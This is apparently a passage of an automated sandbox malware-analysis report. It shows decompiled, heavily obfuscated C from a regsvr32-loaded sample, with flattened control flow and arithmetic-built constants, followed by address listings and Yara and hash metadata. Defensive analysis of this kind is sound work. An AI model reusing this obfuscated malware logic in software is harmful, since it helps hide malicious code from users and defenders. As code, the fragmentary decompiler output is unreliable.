				_v36 = _v36 ^ 0x00fb923e;
				_v240 = 0x92aad5;
				_v240 = _v240 | 0x5d0ac114;
				_t948 = 0x11;
				_v240 = _v240 / _t948;
				_v240 = _v240 + 0x5668;
				_v240 = _v240 ^ 0x058ec842;
				_v140 = 0x640ca6;
				_t949 = 0x30;
				_v140 = _v140 / _t949;
				_v140 = _v140 ^ 0x0009b4cd;
				_v176 = 0x82570b;
				_v176 = _v176 ^ 0x3d9bdb33;
				_v176 = _v176 >> 0x10;
				_v176 = _v176 ^ 0x000787a1;
				_v88 = 0xb5811f;
				_v88 = _v88 + 0x812;
				_v88 = _v88 ^ 0x00bfa4e1;
				_v188 = 0xc91f5d;
				_v188 = _v188 + 0xffffad5f;
				_v188 = _v188 | 0x341e0112;
				_v188 = _v188 ^ 0x34d38f15;
				_v96 = 0x56e619;
				_v96 = _v96 << 0xd;
				_t950 = 0x3a;
				_v96 = _v96 * 0x63;
				_v96 = _v96 ^ 0x5f72b52e;
				_v232 = 0x364d1f;
				_v232 = _v232 / _t950;
				_v232 = _v232 + 0xa098;
				_v232 = _v232 * 0x2c;
				_v232 = _v232 ^ 0x0049fe2e;
				_v28 = 0xcc3131;
				_v28 = _v28 * 0x32;
				_v28 = _v28 ^ 0x27eb4cba;
				_v116 = 0x1ebb5f;
				_v116 = _v116 * 0x54;
				_v116 = _v116 >> 7;
				_v116 = _v116 ^ 0x001ef78d;
				_v248 = 0xf6b113;
				_v248 = _v248 + 0xffff3165;
				_v248 = _v248 | 0xb1f93646;
				_v248 = _v248 * 0x75;
				_v248 = _v248 ^ 0x591acb6a;
				_v308 = 0x659b68;
				_v308 = _v308 + 0xffff71a4;
				_v308 = _v308 >> 6;
				_v308 = _v308 ^ 0x000ffbdc;
				_v196 = 0x7b04db;
				_v196 = _v196 | 0x799bd387;
				_v196 = _v196 + 0xffffd957;
				_v196 = _v196 ^ 0x79fedbe2;
				_v312 = 0x80d0ce;
				_v312 = _v312 * 0xc;
				_v312 = _v312 + 0x1bef;
				_v312 = _v312 | 0xde8eb791;
				_v312 = _v312 ^ 0xde8c5a5f;
				_v204 = 0x7e9e41;
				_v204 = _v204 ^ 0x78eb08e1;
				_v204 = _v204 >> 0xc;
				_v204 = _v204 ^ 0x000052ca;
				_t951 = _v12;
				_t960 = _v12;
				while(1) {
					L1:
					_t920 = 0xc1aa0ea;
					while(1) {
						_t830 = _v256;
						while(1) {
							L3:
							_t966 = _t952 - 0xa785311;
							if(_t966 > 0) {
								break;
							}
							if(_t966 == 0) {
								E001BECE4(_v232, _v28, _t830, _v116, _v248);
								_t952 = 0x9465765;
								goto L12;
							} else {
								if(_t952 == 0x265809f) {
									_t960 = E001B3D5B(_v268, _v72, _v208, _t861, _t861, _v40, _t861, _v80, _t861, _v132);
									__eflags = _t960;
									_t952 =  !=  ? 0xf83b3d3 : 0xf5b5752;
									E001B17D2(_v200, _v124, 0);
									_t962 =  &(_t962[9]);
									L39:
									_t861 = _a8;
									_t920 = 0xc1aa0ea;
									goto L40;
								} else {
									if(_t952 == 0x6707bf9) {
										_t880 =  *_t861;
										__eflags = _t880;
										if(_t880 == 0) {
											_t853 = 0;
											__eflags = 0;
										} else {
											_t853 = _a8[1];
										}
										E001A3129(_t880, _t951, _t880, _t853, _v216, _v4, _v36, _v240, _v140);
										_t962 =  &(_t962[7]);
										asm("sbb esi, esi");
										_t952 = (_t952 & 0x07b41948) + 0x71f4b16;
										goto L13;
									} else {
										if(_t952 == 0x71f4b16) {
											E001BECE4(_v176, _v88, _t951, _v188, _v96);
											_t952 = 0xa785311;
											L12:
											_t962 =  &(_t962[3]);
											L13:
											_t861 = _a8;
											goto L1;
										} else {
											if(_t952 == 0x9465765) {
												E001BECE4(_v308, _v196, _t960, _v312, _v204);
											} else {
												if(_t952 != 0x9cb49f1) {
													L40:
													__eflags = _t952 - 0xf5b5752;
													if(_t952 != 0xf5b5752) {
														_t830 = _v256;
														continue;
													}
												} else {
													_t952 = 0xfe0e961;
													continue;
												}
											}
										}
									}
								}
							}
							L43:
							return _t859;
						}
						__eflags = _t952 - _t920;
						if(_t952 == _t920) {
							__eflags =  *_t861;
							if(__eflags == 0) {
								_t831 = _v16;
							} else {
								_push(_v20);
								_push(0x1a1668);
								_push(_v100);
								_t831 = E001BF5D9(_v112, _v92, __eflags);
								_t962 =  &(_t962[3]);
								_v16 = _t831;
							}
							_t870 = _v168 | _v128 | _v160 | _v276 | _v228 | _v48 | _v252 | _v24 | _v300;
							_t954 = _a36 & 1;
							__eflags = _t954;
							if(_t954 != 0) {
								__eflags = _t870;
							}
							_t951 = E001ACAFE(_t831, _v104, _t870, _v144, _v120, _t870, _t870, _a28, _t870, _v256, _v76, _t870, _v152, _v84);
							E001BF94B(_v16, _v180, _v236, _v68, _v136);
							_t962 =  &(_t962[0xf]);
							__eflags = _t951;
							if(_t951 == 0) {
								_t952 = 0xa785311;
								goto L39;
							} else {
								_v52 = 1;
								E001B6561(_v156, _v164, _v296, _t951, _v172, 4,  &_v52, _v60);
								_t962 =  &(_t962[6]);
								__eflags = _t954;
								if(_t954 != 0) {
									E001B038B( &_v52, _v280, _v288, _v224,  &_v12, _t951, _v148);
									_t764 =  &_v52;
									 *_t764 = _v52 | _v272;
									__eflags =  *_t764;
									E001B6561(_v212, _v264, _v304, _t951, _v44, _v12,  &_v52, _v220);
									_t962 =  &(_t962[0xb]);
								}
								_t952 = 0x6707bf9;
								goto L13;
							}
						} else {
							__eflags = _t952 - 0xd4d6607;
							if(_t952 == 0xd4d6607) {
								__eflags = E001B35A3(_t951, _a4);
								_t952 = 0x71f4b16;
								_t845 = 1;
								_t859 =  !=  ? _t845 : _t859;
								goto L13;
							} else {
								__eflags = _t952 - 0xed3645e;
								if(_t952 == 0xed3645e) {
									__eflags = E001A6D15(_t951, _v184) - _v56;
									_t952 =  ==  ? 0xd4d6607 : 0x71f4b16;
									goto L13;
								} else {
									__eflags = _t952 - 0xf83b3d3;
									if(_t952 == 0xf83b3d3) {
										_push(_v292);
										_push(_v192);
										_push(_t960);
										_push(_v108);
										_push(_v64);
										_push(_v260);
										_push(_a20);
										_push(_v284);
										_push(_v8);
										_t830 = E001A8D7E(_v244, _v32);
										_t861 = _a8;
										_t962 = _t962 - 0x10 + 0x34;
										__eflags = _t830;
										_v256 = _t830;
										_t920 = 0xc1aa0ea;
										_t952 =  !=  ? 0xc1aa0ea : 0x9465765;
										goto L3;
									} else {
										__eflags = _t952 - 0xfe0e961;
										if(_t952 != 0xfe0e961) {
											goto L40;
										} else {
											_t952 = 0x265809f;
											goto L3;
										}
									}
								}
							}
						}
						goto L43;
					}
				}
			}














































































































                                                                                                                0x001bbd6d
                                                                                                                0x001bbd76
                                                                                                                0x001bbd7d
                                                                                                                0x001bbd84
                                                                                                                0x001bbd8b
                                                                                                                0x001bbd92
                                                                                                                0x001bbd99
                                                                                                                0x001bbda3
                                                                                                                0x001bbdaa
                                                                                                                0x001bbdb1
                                                                                                                0x001bbdb8
                                                                                                                0x001bbdbf
                                                                                                                0x001bbdc0
                                                                                                                0x001bbdc7
                                                                                                                0x001bbdc8
                                                                                                                0x001bbdc9
                                                                                                                0x001bbdce
                                                                                                                0x001bbdd6
                                                                                                                0x001bbdd9
                                                                                                                0x001bbde3
                                                                                                                0x001bbded
                                                                                                                0x001bbdf5
                                                                                                                0x001bbdf7
                                                                                                                0x001bbe02
                                                                                                                0x001bbe07
                                                                                                                0x001bbe0e
                                                                                                                0x001bbe17
                                                                                                                0x001bbe1c
                                                                                                                0x001bbe25
                                                                                                                0x001bbe30
                                                                                                                0x001bbe3b
                                                                                                                0x001bbe46
                                                                                                                0x001bbe51
                                                                                                                0x001bbe5c
                                                                                                                0x001bbe64
                                                                                                                0x001bbe6c
                                                                                                                0x001bbe74
                                                                                                                0x001bbe78
                                                                                                                0x001bbe80
                                                                                                                0x001bbe8b
                                                                                                                0x001bbe96
                                                                                                                0x001bbea1
                                                                                                                0x001bbea9
                                                                                                                0x001bbeb1
                                                                                                                0x001bbeb6
                                                                                                                0x001bbebe
                                                                                                                0x001bbec6
                                                                                                                0x001bbed1
                                                                                                                0x001bbed9
                                                                                                                0x001bbee4
                                                                                                                0x001bbeec
                                                                                                                0x001bbef0
                                                                                                                0x001bbef5
                                                                                                                0x001bbefb
                                                                                                                0x001bbf03
                                                                                                                0x001bbf0b
                                                                                                                0x001bbf13
                                                                                                                0x001bbf1c
                                                                                                                0x001bbf1f
                                                                                                                0x001bbf23
                                                                                                                0x001bbf2b
                                                                                                                0x001bbf33
                                                                                                                0x001bbf3e
                                                                                                                0x001bbf53
                                                                                                                0x001bbf5a
                                                                                                                0x001bbf65
                                                                                                                0x001bbf70
                                                                                                                0x001bbf7b
                                                                                                                0x001bbf86
                                                                                                                0x001bbf91
                                                                                                                0x001bbfa5
                                                                                                                0x001bbfaa
                                                                                                                0x001bbfbc
                                                                                                                0x001bbfc5
                                                                                                                0x001bbfd0
                                                                                                                0x001bbfdb
                                                                                                                0x001bbfe6
                                                                                                                0x001bbff1
                                                                                                                0x001bbffc
                                                                                                                0x001bc007
                                                                                                                0x001bc00f
                                                                                                                0x001bc01a
                                                                                                                0x001bc022
                                                                                                                0x001bc02e
                                                                                                                0x001bc033
                                                                                                                0x001bc039
                                                                                                                0x001bc03e
                                                                                                                0x001bc046
                                                                                                                0x001bc059
                                                                                                                0x001bc05a
                                                                                                                0x001bc061
                                                                                                                0x001bc06c
                                                                                                                0x001bc074
                                                                                                                0x001bc07c
                                                                                                                0x001bc084
                                                                                                                0x001bc089
                                                                                                                0x001bc091
                                                                                                                0x001bc099
                                                                                                                0x001bc0a1
                                                                                                                0x001bc0a9
                                                                                                                0x001bc0b1
                                                                                                                0x001bc0b9
                                                                                                                0x001bc0c1
                                                                                                                0x001bc0c6
                                                                                                                0x001bc0ce
                                                                                                                0x001bc0d6
                                                                                                                0x001bc0de
                                                                                                                0x001bc0e6
                                                                                                                0x001bc0ee
                                                                                                                0x001bc0f6
                                                                                                                0x001bc0fb
                                                                                                                0x001bc103
                                                                                                                0x001bc10b
                                                                                                                0x001bc113
                                                                                                                0x001bc11b
                                                                                                                0x001bc123
                                                                                                                0x001bc131
                                                                                                                0x001bc13a
                                                                                                                0x001bc13e
                                                                                                                0x001bc146
                                                                                                                0x001bc14e
                                                                                                                0x001bc156
                                                                                                                0x001bc15e
                                                                                                                0x001bc166
                                                                                                                0x001bc16e
                                                                                                                0x001bc173
                                                                                                                0x001bc17a
                                                                                                                0x001bc182
                                                                                                                0x001bc18a
                                                                                                                0x001bc192
                                                                                                                0x001bc19a
                                                                                                                0x001bc19f
                                                                                                                0x001bc1a7
                                                                                                                0x001bc1af
                                                                                                                0x001bc1b7
                                                                                                                0x001bc1bf
                                                                                                                0x001bc1c7
                                                                                                                0x001bc1cf
                                                                                                                0x001bc1d7
                                                                                                                0x001bc1df
                                                                                                                0x001bc1e4
                                                                                                                0x001bc1ec
                                                                                                                0x001bc1f4
                                                                                                                0x001bc1fc
                                                                                                                0x001bc204
                                                                                                                0x001bc212
                                                                                                                0x001bc217
                                                                                                                0x001bc21d
                                                                                                                0x001bc222
                                                                                                                0x001bc227
                                                                                                                0x001bc22f
                                                                                                                0x001bc237
                                                                                                                0x001bc23c
                                                                                                                0x001bc244
                                                                                                                0x001bc24c
                                                                                                                0x001bc259
                                                                                                                0x001bc25a
                                                                                                                0x001bc25e
                                                                                                                0x001bc266
                                                                                                                0x001bc26e
                                                                                                                0x001bc276
                                                                                                                0x001bc27e
                                                                                                                0x001bc286
                                                                                                                0x001bc28e
                                                                                                                0x001bc299
                                                                                                                0x001bc2a4
                                                                                                                0x001bc2af
                                                                                                                0x001bc2ba
                                                                                                                0x001bc2c5
                                                                                                                0x001bc2d0
                                                                                                                0x001bc2e4
                                                                                                                0x001bc2eb
                                                                                                                0x001bc2f6
                                                                                                                0x001bc301
                                                                                                                0x001bc30c
                                                                                                                0x001bc31f
                                                                                                                0x001bc326
                                                                                                                0x001bc331
                                                                                                                0x001bc33c
                                                                                                                0x001bc344
                                                                                                                0x001bc34c
                                                                                                                0x001bc357
                                                                                                                0x001bc35f
                                                                                                                0x001bc36c
                                                                                                                0x001bc370
                                                                                                                0x001bc378
                                                                                                                0x001bc380
                                                                                                                0x001bc38b
                                                                                                                0x001bc393
                                                                                                                0x001bc39e
                                                                                                                0x001bc3a6
                                                                                                                0x001bc3ab
                                                                                                                0x001bc3af
                                                                                                                0x001bc3b7
                                                                                                                0x001bc3bf
                                                                                                                0x001bc3c7
                                                                                                                0x001bc3d1
                                                                                                                0x001bc3d6
                                                                                                                0x001bc3e5
                                                                                                                0x001bc3e6
                                                                                                                0x001bc3ea
                                                                                                                0x001bc3f2
                                                                                                                0x001bc3fd
                                                                                                                0x001bc408
                                                                                                                0x001bc413
                                                                                                                0x001bc41e
                                                                                                                0x001bc429
                                                                                                                0x001bc431
                                                                                                                0x001bc43c
                                                                                                                0x001bc447
                                                                                                                0x001bc44f
                                                                                                                0x001bc45a
                                                                                                                0x001bc465
                                                                                                                0x001bc478
                                                                                                                0x001bc47f
                                                                                                                0x001bc487
                                                                                                                0x001bc492
                                                                                                                0x001bc49d
                                                                                                                0x001bc4b1
                                                                                                                0x001bc4b8
                                                                                                                0x001bc4c3
                                                                                                                0x001bc4ce
                                                                                                                0x001bc4d6
                                                                                                                0x001bc4e1
                                                                                                                0x001bc4ec
                                                                                                                0x001bc4f7
                                                                                                                0x001bc4ff
                                                                                                                0x001bc50a
                                                                                                                0x001bc515
                                                                                                                0x001bc520
                                                                                                                0x001bc52b
                                                                                                                0x001bc536
                                                                                                                0x001bc541
                                                                                                                0x001bc54c
                                                                                                                0x001bc554
                                                                                                                0x001bc55f
                                                                                                                0x001bc56a
                                                                                                                0x001bc575
                                                                                                                0x001bc580
                                                                                                                0x001bc58b
                                                                                                                0x001bc596
                                                                                                                0x001bc5a1
                                                                                                                0x001bc5ac
                                                                                                                0x001bc5b7
                                                                                                                0x001bc5bf
                                                                                                                0x001bc5c7
                                                                                                                0x001bc5d2
                                                                                                                0x001bc5dd
                                                                                                                0x001bc5e8
                                                                                                                0x001bc5f3
                                                                                                                0x001bc5fe
                                                                                                                0x001bc609
                                                                                                                0x001bc610
                                                                                                                0x001bc61b
                                                                                                                0x001bc623
                                                                                                                0x001bc628
                                                                                                                0x001bc62d
                                                                                                                0x001bc635
                                                                                                                0x001bc63d
                                                                                                                0x001bc648
                                                                                                                0x001bc653
                                                                                                                0x001bc65e
                                                                                                                0x001bc669
                                                                                                                0x001bc674
                                                                                                                0x001bc67f
                                                                                                                0x001bc68a
                                                                                                                0x001bc695
                                                                                                                0x001bc69d
                                                                                                                0x001bc6a5
                                                                                                                0x001bc6b0
                                                                                                                0x001bc6bb
                                                                                                                0x001bc6c8
                                                                                                                0x001bc6d3
                                                                                                                0x001bc6de
                                                                                                                0x001bc6ec
                                                                                                                0x001bc6f1
                                                                                                                0x001bc6f7
                                                                                                                0x001bc6ff
                                                                                                                0x001bc707
                                                                                                                0x001bc70f
                                                                                                                0x001bc71a
                                                                                                                0x001bc725
                                                                                                                0x001bc730
                                                                                                                0x001bc738
                                                                                                                0x001bc745
                                                                                                                0x001bc748
                                                                                                                0x001bc751
                                                                                                                0x001bc755
                                                                                                                0x001bc75d
                                                                                                                0x001bc76d
                                                                                                                0x001bc771
                                                                                                                0x001bc776
                                                                                                                0x001bc77e
                                                                                                                0x001bc789
                                                                                                                0x001bc794
                                                                                                                0x001bc79f
                                                                                                                0x001bc7aa
                                                                                                                0x001bc7b2
                                                                                                                0x001bc7ba
                                                                                                                0x001bc7c2
                                                                                                                0x001bc7ca
                                                                                                                0x001bc7d2
                                                                                                                0x001bc7da
                                                                                                                0x001bc7e2
                                                                                                                0x001bc7ea
                                                                                                                0x001bc7f2
                                                                                                                0x001bc7fa
                                                                                                                0x001bc802
                                                                                                                0x001bc80a
                                                                                                                0x001bc812
                                                                                                                0x001bc81a
                                                                                                                0x001bc822
                                                                                                                0x001bc82a
                                                                                                                0x001bc832
                                                                                                                0x001bc837
                                                                                                                0x001bc83f
                                                                                                                0x001bc847
                                                                                                                0x001bc852
                                                                                                                0x001bc85d
                                                                                                                0x001bc868
                                                                                                                0x001bc870
                                                                                                                0x001bc87c
                                                                                                                0x001bc881
                                                                                                                0x001bc887
                                                                                                                0x001bc88f
                                                                                                                0x001bc897
                                                                                                                0x001bc8b7
                                                                                                                0x001bc8ba
                                                                                                                0x001bc8c1
                                                                                                                0x001bc8cc
                                                                                                                0x001bc8d7
                                                                                                                0x001bc8e2
                                                                                                                0x001bc8ec
                                                                                                                0x001bc8f7
                                                                                                                0x001bc902
                                                                                                                0x001bc90d
                                                                                                                0x001bc918
                                                                                                                0x001bc923
                                                                                                                0x001bc92e
                                                                                                                0x001bc939
                                                                                                                0x001bc944
                                                                                                                0x001bc94f
                                                                                                                0x001bc961
                                                                                                                0x001bc962
                                                                                                                0x001bc969
                                                                                                                0x001bc974
                                                                                                                0x001bc982
                                                                                                                0x001bc986
                                                                                                                0x001bc993
                                                                                                                0x001bc997
                                                                                                                0x001bc99f
                                                                                                                0x001bc9b2
                                                                                                                0x001bc9b9
                                                                                                                0x001bc9c4
                                                                                                                0x001bc9d7
                                                                                                                0x001bc9de
                                                                                                                0x001bc9e6
                                                                                                                0x001bc9f1
                                                                                                                0x001bc9f9
                                                                                                                0x001bca01
                                                                                                                0x001bca0e
                                                                                                                0x001bca12
                                                                                                                0x001bca1a
                                                                                                                0x001bca22
                                                                                                                0x001bca2a
                                                                                                                0x001bca2f
                                                                                                                0x001bca37
                                                                                                                0x001bca42
                                                                                                                0x001bca4d
                                                                                                                0x001bca58
                                                                                                                0x001bca63
                                                                                                                0x001bca70
                                                                                                                0x001bca74
                                                                                                                0x001bca7c
                                                                                                                0x001bca84
                                                                                                                0x001bca8c
                                                                                                                0x001bca94
                                                                                                                0x001bca9c
                                                                                                                0x001bcaa1
                                                                                                                0x001bcaa9
                                                                                                                0x001bcab0
                                                                                                                0x001bcab7
                                                                                                                0x001bcab7
                                                                                                                0x001bcab7
                                                                                                                0x001bcabc
                                                                                                                0x001bcabc
                                                                                                                0x001bcac0
                                                                                                                0x001bcac0
                                                                                                                0x001bcac0
                                                                                                                0x001bcac6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001bcacc
                                                                                                                0x001bcc0a
                                                                                                                0x001bcc0f
                                                                                                                0x00000000
                                                                                                                0x001bcad2
                                                                                                                0x001bcad8
                                                                                                                0x001bcbcc
                                                                                                                0x001bcbd5
                                                                                                                0x001bcbe3
                                                                                                                0x001bcbe6
                                                                                                                0x001bcbeb
                                                                                                                0x001bcebd
                                                                                                                0x001bcebd
                                                                                                                0x001bcec4
                                                                                                                0x00000000
                                                                                                                0x001bcade
                                                                                                                0x001bcae4
                                                                                                                0x001bcb43
                                                                                                                0x001bcb45
                                                                                                                0x001bcb47
                                                                                                                0x001bcb55
                                                                                                                0x001bcb55
                                                                                                                0x001bcb49
                                                                                                                0x001bcb50
                                                                                                                0x001bcb50
                                                                                                                0x001bcb7b
                                                                                                                0x001bcb80
                                                                                                                0x001bcb85
                                                                                                                0x001bcb8d
                                                                                                                0x00000000
                                                                                                                0x001bcae6
                                                                                                                0x001bcaec
                                                                                                                0x001bcb2a
                                                                                                                0x001bcb2f
                                                                                                                0x001bcb34
                                                                                                                0x001bcb34
                                                                                                                0x001bcb37
                                                                                                                0x001bcb37
                                                                                                                0x00000000
                                                                                                                0x001bcaee
                                                                                                                0x001bcaf4
                                                                                                                0x001bceea
                                                                                                                0x001bcafa
                                                                                                                0x001bcb00
                                                                                                                0x001bcec9
                                                                                                                0x001bcec9
                                                                                                                0x001bcecf
                                                                                                                0x001bcabc
                                                                                                                0x00000000
                                                                                                                0x001bcabc
                                                                                                                0x001bcb06
                                                                                                                0x001bcb06
                                                                                                                0x00000000
                                                                                                                0x001bcb06
                                                                                                                0x001bcb00
                                                                                                                0x001bcaf4
                                                                                                                0x001bcaec
                                                                                                                0x001bcae4
                                                                                                                0x001bcad8
                                                                                                                0x001bcef5
                                                                                                                0x001bcefe
                                                                                                                0x001bcefe
                                                                                                                0x001bcc19
                                                                                                                0x001bcc1b
                                                                                                                0x001bcd0a
                                                                                                                0x001bcd0d
                                                                                                                0x001bcd41
                                                                                                                0x001bcd0f
                                                                                                                0x001bcd0f
                                                                                                                0x001bcd16
                                                                                                                0x001bcd1b
                                                                                                                0x001bcd30
                                                                                                                0x001bcd35
                                                                                                                0x001bcd38
                                                                                                                0x001bcd38
                                                                                                                0x001bcd81
                                                                                                                0x001bcd85
                                                                                                                0x001bcd85
                                                                                                                0x001bcd87
                                                                                                                0x001bcd89
                                                                                                                0x001bcd89
                                                                                                                0x001bcdde
                                                                                                                0x001bcdf5
                                                                                                                0x001bcdfa
                                                                                                                0x001bcdfd
                                                                                                                0x001bcdff
                                                                                                                0x001bceb8
                                                                                                                0x00000000
                                                                                                                0x001bce05
                                                                                                                0x001bce0f
                                                                                                                0x001bce3a
                                                                                                                0x001bce3f
                                                                                                                0x001bce42
                                                                                                                0x001bce44
                                                                                                                0x001bce69
                                                                                                                0x001bce79
                                                                                                                0x001bce79
                                                                                                                0x001bce79
                                                                                                                0x001bcea6
                                                                                                                0x001bceab
                                                                                                                0x001bceab
                                                                                                                0x001bceae
                                                                                                                0x00000000
                                                                                                                0x001bceae
                                                                                                                0x001bcc21
                                                                                                                0x001bcc21
                                                                                                                0x001bcc27
                                                                                                                0x001bccf8
                                                                                                                0x001bccfa
                                                                                                                0x001bcd01
                                                                                                                0x001bcd02
                                                                                                                0x00000000
                                                                                                                0x001bcc2d
                                                                                                                0x001bcc2d
                                                                                                                0x001bcc33
                                                                                                                0x001bccdb
                                                                                                                0x001bcce2
                                                                                                                0x00000000
                                                                                                                0x001bcc39
                                                                                                                0x001bcc39
                                                                                                                0x001bcc3f
                                                                                                                0x001bcc57
                                                                                                                0x001bcc5b
                                                                                                                0x001bcc62
                                                                                                                0x001bcc63
                                                                                                                0x001bcc6a
                                                                                                                0x001bcc74
                                                                                                                0x001bcc78
                                                                                                                0x001bcc7f
                                                                                                                0x001bcc8a
                                                                                                                0x001bcc98
                                                                                                                0x001bcc9d
                                                                                                                0x001bcca4
                                                                                                                0x001bcca7
                                                                                                                0x001bcca9
                                                                                                                0x001bccb2
                                                                                                                0x001bccb7
                                                                                                                0x00000000
                                                                                                                0x001bcc41
                                                                                                                0x001bcc41
                                                                                                                0x001bcc47
                                                                                                                0x00000000
                                                                                                                0x001bcc4d
                                                                                                                0x001bcc4d
                                                                                                                0x00000000
                                                                                                                0x001bcc4d
                                                                                                                0x001bcc47
                                                                                                                0x001bcc3f
                                                                                                                0x001bcc33
                                                                                                                0x001bcc27
                                                                                                                0x00000000
                                                                                                                0x001bcc1b
                                                                                                                0x001bcabc

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: %"p$5#$7c$9yL$Ec$F|`$G1$OT$TeC$],0$eWF$eWF$eWF$f{N$hV$D$J
                                                                                                                • API String ID: 0-4285528825
                                                                                                                • Opcode ID: e364c2f247bf0848bdb98578d2b9216ecfd088b489ef8eba4e6240150ea0a25c
                                                                                                                • Instruction ID: 6efde3870433e5b7c5848572aecc73fcce7c0ac056dc842b2a9949335b3035b4
                                                                                                                • Opcode Fuzzy Hash: e364c2f247bf0848bdb98578d2b9216ecfd088b489ef8eba4e6240150ea0a25c
                                                                                                                • Instruction Fuzzy Hash: 77920FB15093818FD3B8CF65C54AA8FBBE1BBD4708F108A1DE5DA96260D7B48949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001AD4BC Relevance: 15.6, Strings: 12, Instructions: 647COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001AD4BC(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				intOrPtr _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				signed int _v2932;
				signed int _v2936;
				signed int _v2940;
				void* _t749;
				signed int _t750;
				signed int _t756;
				signed int _t782;
				void* _t783;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t862;
				signed int _t864;
				signed int _t866;
				void* _t869;
				signed int* _t870;
				void* _t879;

				_t870 =  &_v2940;
				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0xcdb843;
				_v2612 = 0x6224f8;
				_v2884 = 0xb1b113;
				_v2884 = _v2884 >> 0xf;
				_v2884 = _v2884 | 0xff9fddcf;
				_v2884 = _v2884 ^ 0xff9fddc6;
				_v2768 = 0xad1848;
				_v2768 = _v2768 ^ 0x03577078;
				_v2768 = _v2768 ^ 0x9bb3462e;
				_v2768 = _v2768 ^ 0x98592e1e;
				_v2808 = 0x6b6a84;
				_v2808 = _v2808 * 0x4d;
				_t869 = __ecx;
				_t864 = 0x404cf9;
				_t785 = 0x42;
				_v2808 = _v2808 / _t785;
				_v2808 = _v2808 ^ 0x007c4bdd;
				_v2752 = 0x4da79e;
				_v2752 = _v2752 + 0xffffb3ec;
				_t786 = 0x48;
				_v2752 = _v2752 * 0x68;
				_v2752 = _v2752 ^ 0x1f6c26d7;
				_v2892 = 0xdae661;
				_v2892 = _v2892 >> 0xa;
				_v2892 = _v2892 * 0x79;
				_v2892 = _v2892 + 0xffffc3ef;
				_v2892 = _v2892 ^ 0x001d82ae;
				_v2720 = 0x68d3c3;
				_v2720 = _v2720 + 0xa703;
				_v2720 = _v2720 ^ 0x006a1e3d;
				_v2760 = 0x87ea6b;
				_v2760 = _v2760 >> 0xa;
				_v2760 = _v2760 | 0x26b3dcef;
				_v2760 = _v2760 ^ 0x26b4d64a;
				_v2728 = 0x2dee78;
				_t59 =  &_v2728; // 0x2dee78
				_v2728 =  *_t59 * 6;
				_v2728 = _v2728 ^ 0x011afaa9;
				_v2936 = 0x28f3f3;
				_v2936 = _v2936 | 0x5daf9049;
				_v2936 = _v2936 / _t786;
				_v2936 = _v2936 << 0xd;
				_v2936 = _v2936 ^ 0xa3805742;
				_v2824 = 0xef3213;
				_v2824 = _v2824 ^ 0x8f68d062;
				_v2824 = _v2824 << 4;
				_v2824 = _v2824 ^ 0xf877df33;
				_v2820 = 0x5c08bb;
				_v2820 = _v2820 | 0x452ef748;
				_v2820 = _v2820 ^ 0x1b6a95c7;
				_v2820 = _v2820 ^ 0x5e149f64;
				_v2812 = 0xc07ff3;
				_v2812 = _v2812 | 0x9a6b0e6c;
				_v2812 = _v2812 ^ 0x1ccd0fc8;
				_v2812 = _v2812 ^ 0x862bcffb;
				_v2780 = 0xe753fa;
				_v2780 = _v2780 ^ 0x5666a272;
				_v2780 = _v2780 ^ 0x86fa2b61;
				_v2780 = _v2780 ^ 0xd078fd42;
				_v2716 = 0x662694;
				_v2716 = _v2716 * 0x1c;
				_v2716 = _v2716 ^ 0x0b2b4179;
				_v2848 = 0x3fab3b;
				_v2848 = _v2848 * 0x57;
				_v2848 = _v2848 + 0xb1b7;
				_v2848 = _v2848 ^ 0x4663f107;
				_v2848 = _v2848 ^ 0x53cc49a5;
				_v2804 = 0xf44b8b;
				_v2804 = _v2804 ^ 0xcbef5051;
				_t787 = 0x38;
				_v2804 = _v2804 * 0x1d;
				_v2804 = _v2804 ^ 0x021343f5;
				_v2748 = 0xa523ec;
				_v2748 = _v2748 ^ 0xe76e4c1f;
